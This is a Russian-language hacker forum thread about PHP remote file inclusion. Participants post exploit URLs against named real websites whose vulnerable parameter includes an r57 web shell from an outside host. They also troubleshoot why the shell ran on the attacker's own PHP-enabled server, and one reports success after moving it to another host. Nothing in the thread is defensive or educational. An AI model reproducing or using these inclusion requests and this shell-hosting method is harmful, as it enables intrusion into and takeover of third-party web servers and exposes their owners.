|
PHP-injection
Кароче при запросе http://zhertva.com/index.php?page=http://site.ru/r57shell.txt
выдает Warning: main(http:site.ru/r57shell.txt) куда деваются слэши? Что делать? |
фильтры в скрипте стоят от таких как ты
|
народ чего за ботва, чёйто йа не фкуриваю
нашол пару сайтов вродебы с иньекциями http://www.orfw.org/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= там замудрёно заинклудил шелл - там в конце дописывается /styles//error.php ну я создал у ся на сайте диру styles а в ней файл error.php кодом шелла ( r57 ) тоесть получилось так http://мой_сайт/styles/error.php заинклудил таким обраом http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://мой_сайт/ норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять... Обьясните плиззз что нетак я делаю и почему ничего неполучается, и как надо правельно? |
хмм.. у тебя лаги какие-то.
Код:
http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://f4st.hotmail.ru |
перезалил на другой хост - терь всё работает, пасиб)
|
>> норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять...
может, потому что на твоем сайте php поддерживается? ) |
>>может, потому что на твоем сайте php поддерживается? )
ну... эээ... /me ушол пить йат... |
| Время: 15:02 |